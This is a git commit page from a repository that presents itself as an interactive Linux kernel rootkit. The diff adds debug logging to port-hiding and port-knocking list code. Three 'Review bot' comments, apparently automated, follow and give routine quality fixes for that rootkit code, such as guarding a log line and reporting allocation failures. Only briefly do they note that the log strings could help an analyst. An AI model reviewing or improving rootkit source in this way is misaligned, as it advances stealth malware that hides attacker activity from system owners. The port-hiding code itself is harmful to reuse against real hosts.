linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit dbb75ac6b15a47940b8f1025c7e506489441c999
parent c948ab5e7ca06e905f2b359b8e184bfc2a62e1f9
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 17:46:05 +0100

adds debug info

Diffstat:
Msrc/porthide.c | 15++++++++++++++-
1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/src/porthide.c b/src/porthide.c @@ -55,13 +55,16 @@ lport_list_t_ptr hidden_lports_tail = &hidden_lports; void hide_lport(lport_t lport) { - if (!list_contains_lport(&hidden_lports, lport)) + if (!list_contains_lport(&hidden_lports, lport)) { + DEBUG_INFO("hiding lport %d\n", lport); add_lport_to_list(hidden_lports_tail, lport); + } } void unhide_lport(lport_t lport) { + DEBUG_INFO("unhiding lport %d\n", lport); remove_lport_from_list(hidden_lports_tail, lport); } @@ -101,6 +104,8 @@ clear_hidden_lports(void) j = hidden_lports_tail; while ((j = remove_lport_from_list(j, j->lport))); + + DEBUG_INFO("cleared hidden lports and knocks\n"); } bool @@ -127,6 +132,8 @@ add_lport_to_list(lport_list_t_ptr tail, lport_t lport) node = (lport_list_t_ptr)kmalloc(sizeof(lport_list_t), GFP_KERNEL); if (node) { + DEBUG_INFO("adding lport %d to list\n", lport); + node->lport = lport; node->next = NULL; node->prev = tail; @@ -144,6 +151,8 @@ remove_lport_from_list(lport_list_t_ptr list, lport_t lport) lport_list_t_ptr i = find_lport_in_list(list, lport), ret = NULL; if (i && (i->lport != -1)) { + DEBUG_INFO("removing lport %d from list\n", lport); + if (i->next) i->next->prev = i->prev; else @@ -184,6 +193,8 @@ add_knock_to_list(knock_list_t_ptr *tail, ip_t ip, ip_version version) node = (knock_list_t_ptr)kmalloc(sizeof(knock_list_t), GFP_KERNEL); if (node) { + DEBUG_INFO("adding knock to list\n"); + memcpy(node->ip, ip, (version == v4 ? 4 : 16)); node->version = version; node->next = NULL; @@ -202,6 +213,8 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL; if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) { + DEBUG_INFO("removing knock from list\n"); + if (i->next) i->next->prev = i->prev; else
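Review bot: In `unhide_lport` the new `DEBUG_INFO("unhiding lport %d\n", lport);` runs before any membership check, so it is printed even when the port was never in the list, whereas `hide_lport` logs only inside its `list_contains_lport` guard. Since `remove_lport_from_list` gains its own "removing lport" message in a later hunk of this commit, the unconditional line can be dropped or guarded with `if (list_contains_lport(&hidden_lports, lport))` so the log reflects what actually changed. What `DEBUG_INFO` expands to is not shown on this page; if it reaches the kernel log, these fixed message prefixes are stable strings an analyst can search for on a host where a debug build was loaded.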
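Review bot: The message `cleared hidden lports and knocks` is printed at the end of `clear_hidden_lports`, but the only loop visible in this hunk walks `hidden_lports_tail`; the function starts outside the hunk, so whether knocks are also cleared here cannot be confirmed. If they are not, the text should read `DEBUG_INFO("cleared hidden lports\n");`. The empty-bodied `while ((j = remove_lport_from_list(j, j->lport)));` is easy to misread and would benefit from a one-line comment saying it appears to remove nodes starting at the tail until the call returns NULL.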
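Review bot: Allocation failure stays silent in `add_lport_to_list`: the new message sits inside `if (node)`, and no visible line reports a NULL return from `kmalloc`, so the "hiding lport" line from `hide_lport` can appear with nothing actually added. The same applies to `add_knock_to_list` in the later hunk. Both functions continue outside their hunks, so an existing `else` cannot be ruled out; if there is none, add one such as `else DEBUG_INFO("kmalloc failed for lport %d\n", lport);`. The `%d` specifier also assumes `lport_t` promotes to `int`, which the page does not show.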